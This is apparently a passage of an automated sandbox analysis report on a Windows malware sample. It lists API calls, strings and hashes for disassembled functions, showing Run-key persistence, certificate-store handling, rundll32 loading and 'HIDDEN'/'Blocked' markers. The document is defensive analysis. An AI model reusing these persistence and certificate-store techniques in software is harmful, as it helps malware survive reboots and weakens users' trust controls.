                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0045E8C6
                                                                                                                                        • %lu.exe, xrefs: 0045E896
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                                                                                                                                        • String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                        • API String ID: 1404517112-2576086316
                                                                                                                                        • Opcode ID: 27b8c997346d2fc42b01e1cc73fb4cc5ae76f69e90ce9a6125aa254fdeaf64c1
                                                                                                                                        • Instruction ID: bdcd0034ad6c94f5f8019f9e67677b5c88a35008e701dcf178e9c476c3bcd8af
                                                                                                                                        • Opcode Fuzzy Hash: 27b8c997346d2fc42b01e1cc73fb4cc5ae76f69e90ce9a6125aa254fdeaf64c1
                                                                                                                                        • Instruction Fuzzy Hash: BB216DB1900208FFDB115FA2DC88DAF7F6CEF05395B114036F90592111EBB58E49CAAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045021F, Relevance: 21.3, APIs: 9, Strings: 5, Instructions: 269COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID: *LD$8jF$PG$\gF$zlF
                                                                                                                                        • API String ID: 1279760036-3567566356
                                                                                                                                        • Opcode ID: e4fa8d7cc3e79d5cf4b329d0cad357e72b574f8d501beae86499f920af4b84e4
                                                                                                                                        • Instruction ID: 98c303ccefd318f8946966fe289bfa51ae12c4b9df43f11257b4408b08297f8b
                                                                                                                                        • Opcode Fuzzy Hash: e4fa8d7cc3e79d5cf4b329d0cad357e72b574f8d501beae86499f920af4b84e4
                                                                                                                                        • Instruction Fuzzy Hash: 0AA14835D00209EFDF22DF95CC05AEEBBB5FF05306F00406AE911A2261D7799E99DB19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004622EB, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046233A
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,20000920,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462353
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046235E
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,20000920,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462377
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462420
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00462442
                                                                                                                                        • lstrcpy.KERNEL32(00000020,?), ref: 00462461
                                                                                                                                        • lstrlen.KERNEL32(?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046246B
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624AC
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624BF
                                                                                                                                        • SwitchToThread.KERNEL32(00000057,00000000,?,0000012C,?,?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624E3
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000012C,?,?,?,?,?,00000000,0044777D,?,00000004,0000012C), ref: 00462502
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462528
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462544
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3323474148-0
                                                                                                                                        • Opcode ID: 88159348779a0646909cb28fd105e0649e22e489ad1ee3e5f91e33e895372b3a
                                                                                                                                        • Instruction ID: cd984033c2a1b26ac68fe09def032ff00af3e4726ae86703a43d9b6e6cf33cf7
                                                                                                                                        • Opcode Fuzzy Hash: 88159348779a0646909cb28fd105e0649e22e489ad1ee3e5f91e33e895372b3a
                                                                                                                                        • Instruction Fuzzy Hash: 30716A31504701AFD721DF25CD45A5BBBE8BF48304F04492EF989D2261E7B8E989CB9B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044EFC6, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144memoryregistryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000104,74B05520), ref: 0044EFFC
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0044F011
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0044F039
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044F07A
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0044F08A
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004436F5), ref: 0044F09D
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004436F5), ref: 0044F0AC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,004436F5,00000000,?,?,?), ref: 0044F0F6
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?,?), ref: 0044F11A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?), ref: 0044F13F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?), ref: 0044F154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate$CloseCreate
                                                                                                                                        • String ID: jjF
                                                                                                                                        • API String ID: 4126010716-3131895916
                                                                                                                                        • Opcode ID: 1a35956cce3f7f415e56bc7ec92e561e25ae04e40556d5c70b25100887365c2e
                                                                                                                                        • Instruction ID: c6eeb4b23e65c5f193751e5163a0aa72c443a9f507d8ef756c5cdb44e7ee5231
                                                                                                                                        • Opcode Fuzzy Hash: 1a35956cce3f7f415e56bc7ec92e561e25ae04e40556d5c70b25100887365c2e
                                                                                                                                        • Instruction Fuzzy Hash: A351D1B5D00249EFDF019F94DD808EEBBB9FB08344F10447AE509A2220E7759E98DF69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458ED6, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00458EFA
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00458F10
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00458F21
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                          • Part of subcall function 0044E3F6: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00458F68,00000020,00000000,?,00000000), ref: 0044E461
                                                                                                                                          • Part of subcall function 0044E3F6: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00458F68,00000020,00000000,?,00000000), ref: 0044E489
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00458F96
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00458FA6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00458FF2
                                                                                                                                        • wsprintfA.USER32 ref: 00459003
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0045900E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00459028
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                                                                                                        • String ID: DLL load status: %u$PluginRegisterCallbacks$W
                                                                                                                                        • API String ID: 630447368-2893651616
                                                                                                                                        • Opcode ID: e2040519ce1de86b0534e2394038116c96c0363b4977089a13086c644343b68e
                                                                                                                                        • Instruction ID: 666d2c759840f7ac01acc179677995d63e6d1cba7bb75ceefc6333365b51d28e
                                                                                                                                        • Opcode Fuzzy Hash: e2040519ce1de86b0534e2394038116c96c0363b4977089a13086c644343b68e
                                                                                                                                        • Instruction Fuzzy Hash: A641B271901119FBCB119F61DC44DAF7F79EF08345B10442AF905A2262EFB88958DBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004423EA, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 101registrymemorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00442406
                                                                                                                                          • Part of subcall function 00444AED: RegCloseKey.ADVAPI32(?), ref: 00444B74
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0044243E
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0044244F
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 0044248A
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004424B5
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 004424CB
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 004424E0
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 004424F0
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00442505
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0044250A
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 004423F6
                                                                                                                                        • VjF, xrefs: 00442469
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$VjF
                                                                                                                                        • API String ID: 4138089493-3424450790
                                                                                                                                        • Opcode ID: 1c5ff672c556749f881eff26ad64f6416b3d25e78aa249670dadfa877e179a22
                                                                                                                                        • Instruction ID: 54ed992542c169cdf8bb4fcb49babd47a098f9d5e00b8de1cb0baa0a3031036e
                                                                                                                                        • Opcode Fuzzy Hash: 1c5ff672c556749f881eff26ad64f6416b3d25e78aa249670dadfa877e179a22
                                                                                                                                        • Instruction Fuzzy Hash: 71317975E00108FFEB119FA5DD48CAEBBB9FB48704B414066F904E2120E7B59E44DF69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044FEAC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0044FEC3
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FED5
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FEE2
                                                                                                                                        • wsprintfA.USER32 ref: 0044FEF6
                                                                                                                                        • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF0C
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0044FF25
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000), ref: 0044FF2D
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044FF3B
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044FF44
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF55
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF65
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                                                                                                        • String ID: \\.\%s
                                                                                                                                        • API String ID: 3873609385-869905501
                                                                                                                                        • Opcode ID: 2a82f6028d28dca07a9ef7daad5ed487de539abec159e86a734ba9cec0606d43
                                                                                                                                        • Instruction ID: eda39bd70339bf9b4d9ac1a79e686c6aadb55d19b3cef92eec0db8de9ce47f86
                                                                                                                                        • Opcode Fuzzy Hash: 2a82f6028d28dca07a9ef7daad5ed487de539abec159e86a734ba9cec0606d43
                                                                                                                                        • Instruction Fuzzy Hash: 4F11A271645214BFE2202B60AC4CF7B3B5CEB06769F05063AFA0691191FEA41D4D817E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453BC3, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,000004D2), ref: 00453BE6
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00453BEF
                                                                                                                                        • GetLastError.KERNEL32 ref: 00453BF9
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00453C7D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                                                                                                        • String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
                                                                                                                                        • API String ID: 3543646443-3095660563
                                                                                                                                        • Opcode ID: 6ed7505e91372896ab8f01cc74224a061028d7e10a1946daa27a0ffbc88a5728
                                                                                                                                        • Instruction ID: 48ccd45be52343d137573f5452a435f176de0a4e798dfc66580ae48d08c8f6d1
                                                                                                                                        • Opcode Fuzzy Hash: 6ed7505e91372896ab8f01cc74224a061028d7e10a1946daa27a0ffbc88a5728
                                                                                                                                        • Instruction Fuzzy Hash: A10173212823A072C53137A26C4BFDB6E1C8F877B6F14091BB94F61192AE9C460981BF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00453D21, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
                                                                                                                                          • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
                                                                                                                                          • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 00453D57
                                                                                                                                        • memset.NTDLL ref: 00453D68
                                                                                                                                        • lstrcmpi.KERNEL32(?,?), ref: 00453DA8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00453DD1
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00453DE5
                                                                                                                                        • memset.NTDLL ref: 00453DF2
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 00453E0B
                                                                                                                                        • memcpy.NTDLL(-00000005,HIDDEN,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 00453E26
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00453E43
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                                                                                                        • String ID: Blocked$HIDDEN
                                                                                                                                        • API String ID: 694413484-4010945860
                                                                                                                                        • Opcode ID: c8d36fb155329b96d7c16fc34eafece85db1c93f2fc0aa3f1a354e61482d2907
                                                                                                                                        • Instruction ID: 6db213d1d46037fae8dabeee3e02d40bf9d564ca661b567f79b8f687d92dede0
                                                                                                                                        • Opcode Fuzzy Hash: c8d36fb155329b96d7c16fc34eafece85db1c93f2fc0aa3f1a354e61482d2907
                                                                                                                                        • Instruction Fuzzy Hash: 2C41C171E40209FFDB109FA5CC41B9EBBB5FF04356F14442AE804A3292E778AF488B59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454B9D, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 118registrymemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL ref: 00454BC6
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00454C07
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00454C1B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 00454C70
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 00454CBA
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 00454CC8
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00454CD3
                                                                                                                                          • Part of subcall function 00463722: RegCreateKeyA.ADVAPI32(80000001,?,00000001), ref: 00463736
                                                                                                                                          • Part of subcall function 00463722: memcpy.NTDLL(00000000,?,00000001,00000001,00000000,?,0044346C,Blocked,00000000,?,00000001,Blocked), ref: 0046375F
                                                                                                                                          • Part of subcall function 00463722: RegCloseKey.ADVAPI32(00000001,?,0044346C,Blocked,00000000,?,00000001,Blocked), ref: 004637B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                                                                                                                                        • String ID: Client32$RgF$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
                                                                                                                                        • API String ID: 2070110485-1621351620
                                                                                                                                        • Opcode ID: ec37de8c322c0ff66e6a2b01205b9f72d7a4a2ce553822e9dae1a7fced91aa58
                                                                                                                                        • Instruction ID: 8452e0c923af6ab436e747ccb7c6b742ce30df50facc1d30f91912876801c912
                                                                                                                                        • Opcode Fuzzy Hash: ec37de8c322c0ff66e6a2b01205b9f72d7a4a2ce553822e9dae1a7fced91aa58
                                                                                                                                        • Instruction Fuzzy Hash: D8310671601210BBDB225F11DC44E6F3BA8EBC1B4AF160026FC06DA252D7B9CD85D699
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463E1A, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
                                                                                                                                          • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
                                                                                                                                          • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004572FE,00000000), ref: 00463E6B
                                                                                                                                        • lstrlen.KERNEL32(00000008,?,?,?,004572FE,00000000), ref: 00463E7A
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00463E8C
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,004572FE,00000000), ref: 00463E9C
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,004572FE,?,?,?,004572FE,00000000), ref: 00463EAE
                                                                                                                                        • lstrcpy.KERNEL32(00000020), ref: 00463EE0
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 00463EEC
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00463F44
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                                                                                                        • String ID: `F$`F
                                                                                                                                        • API String ID: 3746371830-2341081391
                                                                                                                                        • Opcode ID: 79d3e20593675fa163c3d35773e53faf7105b5faa87b97b7e719a8677e318847
                                                                                                                                        • Instruction ID: b4dec4e0baddeef078767dc347dfe26abbe2775035ba2229e8f849b01231c0fe
                                                                                                                                        • Opcode Fuzzy Hash: 79d3e20593675fa163c3d35773e53faf7105b5faa87b97b7e719a8677e318847
                                                                                                                                        • Instruction Fuzzy Hash: EE419975900705EFCB218F55DC44B5ABBF8FB18312F10452EF80993211EBB99E49CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045EEA2, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 94filememorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DF7: memset.NTDLL ref: 00458E19
                                                                                                                                          • Part of subcall function 00458DF7: CloseHandle.KERNEL32(?,?,?,?,?), ref: 00458EC6
                                                                                                                                        • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0045EEE9
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045EEF5
                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 0045EF05
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0045EF0F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045EF20
                                                                                                                                        • wcstombs.NTDLL ref: 0045EF31
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045EF3E
                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 0045EF74
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045EF86
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0045EF94
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                                                                                                        • String ID: LjF
                                                                                                                                        • API String ID: 2256351002-2255276606
                                                                                                                                        • Opcode ID: a628e6282974e09a27d3d2af632d80bcb4454f07cf500f404a68496d0c0deb35
                                                                                                                                        • Instruction ID: b0b1d424bfc27d1def8092b5a137d59387d9ee8a39c46ad4fd8142ce9af228b2
                                                                                                                                        • Opcode Fuzzy Hash: a628e6282974e09a27d3d2af632d80bcb4454f07cf500f404a68496d0c0deb35
                                                                                                                                        • Instruction Fuzzy Hash: DC313C72900109FFCF119FA5DC8989F7B79FF44306B00446AF901A2261EB758E59DB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450A3B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00450A4B
                                                                                                                                        • CreateFileW.KERNEL32(0046088E,80000000,00000003,0046E0F8,00000003,00000000,00000000,?,0046088E,?,00000000,?,00000000), ref: 00450A68
                                                                                                                                        • GetLastError.KERNEL32(?,0046088E,?,00000000,?,00000000), ref: 00450B09
                                                                                                                                          • Part of subcall function 0044EA3B: lstrlen.KERNEL32(?,00000000,00450A89,00000027,0046E0F8,?,00000000,?,?,00450A89,Local\,00000001,?,0046088E,?,00000000), ref: 0044EA71
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcpy.KERNEL32(00000000,00000000), ref: 0044EA95
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcat.KERNEL32(00000000,00000000), ref: 0044EA9D
                                                                                                                                        • GetFileSize.KERNEL32(0046088E,00000000,Local\,00000001,?,0046088E,?,00000000,?,00000000), ref: 00450A94
                                                                                                                                        • CreateFileMappingA.KERNEL32(0046088E,0046E0F8,00000002,00000000,00000000,0046088E), ref: 00450AA8
                                                                                                                                        • lstrlen.KERNEL32(0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AC4
                                                                                                                                        • lstrcpy.KERNEL32(?,0046088E), ref: 00450AD4
                                                                                                                                        • GetLastError.KERNEL32(?,0046088E,?,00000000,?,00000000), ref: 00450ADC
                                                                                                                                        • HeapFree.KERNEL32(00000000,0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AEF
